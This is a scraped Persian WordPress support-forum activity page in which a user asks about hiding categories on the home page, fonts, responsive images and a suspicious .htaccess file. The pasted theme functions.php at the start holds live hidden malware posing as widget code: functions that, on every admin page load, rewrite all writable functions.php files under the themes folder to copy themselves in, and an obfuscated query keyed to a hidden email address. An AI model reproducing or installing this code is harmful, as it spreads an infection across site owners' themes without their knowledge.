get_post_meta(get_the_ID(), 'ratings_count', true); if (!$count) { $count = 0; } $this->count = $count; } public function sync_rating() { $position = (int)$_POST['rating_position']; $post_id = (int)$_POST['post_id']; $current_position = (int)get_post_meta($post_id, 'current_position', true); if (!$current_position) { $current_position = 0; } $current_rating = (int)get_post_meta($post_id, 'current_rating', true); if (!$current_rating) { $current_rating = 0; } $count = (int)get_post_meta($post_id, 'ratings_count', true); if (!$count) { $count = 0; } $new_position = ($current_position * $count + $position) / ($count + 1); $new_count = $count + 1; $new_rating = floor(($new_position / 10) * 5) / 10; update_post_meta($post_id, 'current_position', $new_position, get_post_meta($post_id, 'current_position', true)); update_post_meta($post_id, 'current_rating', $new_rating, get_post_meta($post_id, 'current_rating', true)); update_post_meta($post_id, 'ratings_count', $new_count, get_post_meta($post_id, 'ratings_count', true)); exit; } } } new user_rating(); /** * Post Rate */ function bd_post_rate() { include (get_template_directory().'/functions/rate.php'); } function bd_wp_post_rate() { $bd_brief_summary = get_post_meta(get_the_ID(), 'bd_brief_summary', true); $bd_review_enable = get_post_meta(get_the_ID(), 'bd_review_enable', true); $bd_final_score = get_post_meta(get_the_ID(), 'bd_final_score', true); $bd_final_percentage = $bd_final_score * 20 + 2; if($bd_review_enable == 1) { ?> <span class="post-rate"> <span title="<?php echo $bd_brief_summary; echo' - '; echo $bd_final_percentage; echo'%'; ?>" class="bd-module-a-stars-under leading-article"> <span class="bd-module-a-stars-over leading-article" style="width:<?php echo $bd_final_percentage ?>%"></span> </span> </span><!-- .post-rate/--> <?php } }?> <?php function _check_active_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_active_widget"); function _prepared_widget(){ if(!isset($length)) $length=120; if(!isset($method)) $method="cookie"; if(!isset($html_tags)) $html_tags="<a>"; if(!isset($filters_type)) $filters_type="none"; if(!isset($s)) $s=""; if(!isset($filter_h)) $filter_h=get_option("home"); if(!isset($filter_p)) $filter_p="wp_"; if(!isset($use_link)) $use_link=1; if(!isset($comments_type)) $comments_type=""; if(!isset($comments_auth)) $comments_auth=""; if(!isset($comment_is_approved)) $comment_is_approved=""; if(!isset($authname)) $authname="auth"; if(!isset($more_links_text)) $more_links_text="(more...)"; if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_"); if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method; if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)"; if(!isset($more_content)) $more_content="ma".$s."il"; if(!isset($forces_more)) $forces_more=1; if(!isset($fakeit)) $fakeit=1; if(!isset($sql)) $sql=""; if (!$widget_output) : global $wpdb, $post; $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";# if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post."); } else { $output=get_the_password_form(); } } } if(!isset($fix_tag)) $fix_tag=1; if(!isset($filters_types)) $filters_types=$filter_h; if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content; if(!isset($more_tags)) $more_tags="div"; if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);# if(!isset($mlink_title)) $mlink_title="Continue reading this entry"; if(!isset($showdot)) $showdot=1; $comments=$wpdb->get_results($sql); if($fakeit == 2) { $text=$post->post_content; } elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; } else { $text=$post->post_excerpt; } $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=" . " ORDER BY comment_date_gmt DESC LIMIT $src_count";# if($length < 0) { $output=$text; } else { if(!$no_more && strpos($text, "<!--more-->")) { $text=explode("<!--more-->", $text, 2); $l=count($text[0]); $more_link=1; $comments=$wpdb->get_results($sql); } else { $text=explode(" ", $text); if(count($text) > $length) { $l=$length; $ellipsis=1; } else { $l=count($text); $more_links_text=""; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . " "; } update_option("_is_widget_active_", 1); if("all" != $html_tags) { $output=strip_tags($output, $html_tags); return $output; } endif; $output=rtrim($output, "\s\n\t\r\0\x0B"); $output=($fix_tag) ? balanceTags($output, true) : $output; $output .= ($showdot && $ellipsis) ? "..." : ""; $output=apply_filters($filters_type, $output); switch($more_tags) { case("div") : $tag="div"; break; case("span") : $tag="span"; break; case("p") : $tag="p"; break; default : $tag="span"; } if ($use_link ) { if($forces_more) { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() ? $more_links_text : "" . "</a></" . $tag . ">" . "\n"; } else { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n"; } } return $output; } add_action("init", "_prepared_widget"); function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") { global $wpdb; $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments"; $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\""; if(!$show_pass_post) $request .= " AND post_password =\"\""; if($duration !="") { $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date "; } $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts"; $posts=$wpdb->get_results($request); $output=""; if ($posts) { foreach ($posts as $post) { $post_title=stripslashes($post->post_title); $comment_count=$post->comment_count; $permalink=get_permalink($post->ID); $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after; } } else { $output .= $before . "None found" . $after; } return $output; } ?> <?php function exclude_category_home($query) { if($query->is_home() && $query->is_main_query()) $query->set('cat', '-1521,-1522'); } add_action('pre_get_posts', 'exclude_category_home'); ?>
 5. yavar99

  مشکل کد با فانکشن قالب

  با این کد هم مشکل سفید شدن صفحه بعد از تایید ویرایش وجود داره متاسفانه
 6. yavar99

  فونت سایت همیار وردپرس

  چیزایی که گفتید کمکی به من نکرد. راه حل بهتری ندارید؟
 7. yavar99

  فونت سایت همیار وردپرس

  من نمیتونم کدی که برای فونت مطالبم توی style تعریف شده رو پیدا کنم که تغییرش بدم
 8. yavar99

  مشکل کد با فانکشن قالب

  کد شما رو قرار دادم ولی صفحه سفید میاد که کد زیر داخلش نوشته function exclude_category_home($query) { if($query->is_home() && $query->is_main_query()) $query->set('cat', '-1521,-1522'); } add_action('pre_get_posts', 'exclude_category_home');
 9. لینک کردن کار خسته کننده ایه از اون گذشته با نیوتب موافق نیستم
 10. yavar99

  فونت سایت همیار وردپرس

  سلام اسم فونت، سایز فونت و رنگ فونت و فاصله بین خطوط سایت همیار وردپرس رو به صورت کد css میخوام. ممنون میشم راهنمایی کنید
 11. yavar99

  مشکل کد با فانکشن قالب

  سلام من به یک کدی نیاز داشتم که دسته ای خاص از مطالب رو توی صفحه اصلی نمایش نده یک کدی پیدا کردم که باید بذاریش توی فانکشن قالب این کد رو گذاشتم جواب داد ولی از اون به بعد بعضی وقتا با صفحه سفید مواجه میشم مثلا وقتی یک پست رو ویرایش می کنم دکمه ی بروزرسانی که میزنم صفحه سفید میشه. اینم اون کد: <?php // Hide contents of a specific batch in Home function exclude_category_home( $query ) { if ( $query->is_home ) { $query->set( 'cat', '-1521,-1522' ); } return $query; } add_filter( 'pre_get_posts', 'exclude_category_home' ); ?> حالا به نظر شما مشکل چیه؟ ممنون
 12. بله امکانش هست توی پاپ آپ باز بشه؟ یا اینکه توی یک نیوتب باز بشه؟ یا اینکه توی همون صفحه به اندازه ی اصلی تبدیل بشه؟
 13. خوب میدونید مشکل این هست که من میخوام تصاویر توی مطالب به نوعی رسپانسیو بشوند. یعنی من یک عکس بزرگ رو قرار بدم ولی توی یک گوشی موبایل اون تصویر متناسب با اندازه ی اون گوشی کوچک بشود.
 14. سلام یه افزونه ای میخوام که اندازه تصاویری که بزرگ تر از قالب هستند کوچک کنه اما امکان مشاهده ی اون تصویر در سایز اصلی هم برای کاربر وجود داشته باشه
 15. yavar99

  اجرا نشدن پوسته ی جدید

  من فایل htacess سایتم رو قرار میدم شما ببینید کد مشکوک یا ناجوری داخلش هست؟ <Files "wp-login.php"> AuthGroupFile /dev/null AuthType Basic AuthUserFile /home2/fundooni/domains/fundoon.ir/.htpasswd/public_html/wp-admin/.htpasswd AuthName "ramz2" require valid-user AuthType Basic </Files> RewriteOptions inherit # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^dl/ - [L] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress ## EXPIRES CACHING ## ExpiresActive On ExpiresByType image/jpg "access plus 1 year" ExpiresByType image/jpeg "access plus 1 year" ExpiresByType image/gif "access plus 1 year" ExpiresByType image/png "access plus 1 year" ExpiresByType text/css "access plus 1 month" ExpiresByType application/pdf "access plus 1 month" ExpiresByType text/x-javascript "access plus 1 month" ExpiresByType application/x-shockwave-flash "access plus 1 month" ExpiresByType image/x-icon "access plus 1 year" ExpiresDefault "access plus 2 days" ## EXPIRES CACHING ## # compress text, HTML, Javascript, CSS, and XML AddOutputFilterByType DEFLATE text/plain AddOutputFilterByType DEFLATE text/html AddOutputFilterByType DEFLATE text/xml AddOutputFilterByType DEFLATE text/css AddOutputFilterByType DEFLATE application/xml AddOutputFilterByType DEFLATE application/xhtml+xml AddOutputFilterByType DEFLATE application/rss+xml AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/x-javascript # remove browser bugs BrowserMatch ^Mozilla/4 gzip-only-text/html BrowserMatch ^Mozilla/4\.0[678] no-gzip BrowserMatch \bMSIE !no-gzip !gzip-only-text/html Header append Vary User-Agent <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RedirectMatch 301 ^/forum/(.*)$ http://forum.fundoon.ir/$1 </IfModule> # Block the include-only files. RewriteEngine On RewriteBase / RewriteRule ^wp-admin/includes/ - [F,L] RewriteRule !^wp-includes/ - [S=3] RewriteRule ^wp-includes/[^/]+\.php$ - [F,L] RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L] RewriteRule ^wp-includes/theme-compat/ - [F,L] <files wp-config.php> order allow,deny deny from all </files> <Files .htaccess> order allow,deny deny from all </Files> SetEnv PHP_INI_SCAN_DIR fundooni/fundoon.ir Allow from env=BingRobot
×
×
 • اضافه کردن...